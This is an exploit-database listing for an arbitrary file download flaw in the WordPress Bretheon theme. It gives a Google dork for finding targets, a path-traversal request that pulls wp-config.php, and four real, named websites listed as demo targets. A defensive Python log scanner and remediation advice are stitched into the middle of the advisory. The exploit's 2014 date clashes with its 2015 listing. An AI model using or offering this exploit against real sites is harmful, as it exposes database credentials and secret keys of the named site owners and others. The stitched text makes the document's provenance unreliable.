Wordpress Theme Bretheon Arbitrary File Download Vulnerability

2015-01-18T00:00:00
ID 1337DAY-ID-23140
Type zdt
Reporter MindCracker
Modified 2015-01-18T00:00:00

Description

Exploit for php platform in category web applications

                                        
# Exploit Title: Wordpress Theme Bretheon Arbitrary File Download Vulnerability

# Date: 17/01/2014

# Exploit Author: MindCracker - Team MaDLeeTs

# Contact : https://twitter.com/MindCrackerKhan

# Tested on: Linux / Windows

# Google Dork: inurl:wp-content/themes/bretheon/

######################
 
# PoC

http://target/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
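For defenders, the request shape in the PoC above can be matched in web server access logs. The following is an added example, not part of the original advisory: the log lines are constructed samples, and the image-extension allowlist and function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Assumption: extensions a legitimate revslider_show_image request would ask for.
IMAGE_EXT = (".jpg", ".jpeg", ".png", ".gif", ".webp", ".bmp")
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<url>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

# Constructed sample lines in combined log format (documentation IP ranges).
SAMPLE_LOG = [
    '203.0.113.7 - - [18/Jan/2015:10:01:02 +0000] "GET /wp-admin/admin-ajax.php'
    '?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 200 3120',
    '203.0.113.7 - - [18/Jan/2015:10:01:05 +0000] "GET /wp-admin/admin-ajax.php'
    '?action=revslider_show_image&img=..%252fwp-config.php HTTP/1.1" 404 512',
    '198.51.100.20 - - [18/Jan/2015:10:02:00 +0000] "GET /wp-admin/admin-ajax.php'
    '?action=revslider_show_image&img=uploads/2015/01/slide1.jpg HTTP/1.1" 200 48211',
    '198.51.100.20 - - [18/Jan/2015:10:02:01 +0000] "GET /index.php HTTP/1.1" 200 1000',
]

def fully_decode(value, max_rounds=5):
    """Undo nested percent-encoding so an encoded '../' is still recognised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(line):
    """Return None for unrelated lines, else (verdict, status, img) for this action."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group("url"))
    if not url.path.endswith("/wp-admin/admin-ajax.php"):
        return None
    params = parse_qs(url.query, keep_blank_values=True)
    if "revslider_show_image" not in params.get("action", []):
        return None
    img = fully_decode(params.get("img", [""])[0]).replace("\\", "/")
    traversal = ".." in img.split("/") or img.startswith("/")
    non_image = not img.lower().endswith(IMAGE_EXT)
    verdict = "suspicious" if (traversal or non_image) else "benign"
    return verdict, int(m.group("status")), img

def scan(lines):
    """Return only the suspicious hits, in log order."""
    return [hit for hit in map(classify, lines) if hit and hit[0] == "suspicious"]

if __name__ == "__main__":
    for verdict, status, img in scan(SAMPLE_LOG):
        print(f"{verdict}: status={status} img={img}")
```

A suspicious hit answered with status 200 means the file was likely served. If the requested file was `wp-config.php`, rotate the database credentials and the authentication keys and salts it contains.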


#Demo

http://infiniteloopcorp.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://scottysgym.com.au/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://vladlogistik.ru/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://transinfo.nnov.ru/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


#  0day.today [2018-02-18]  #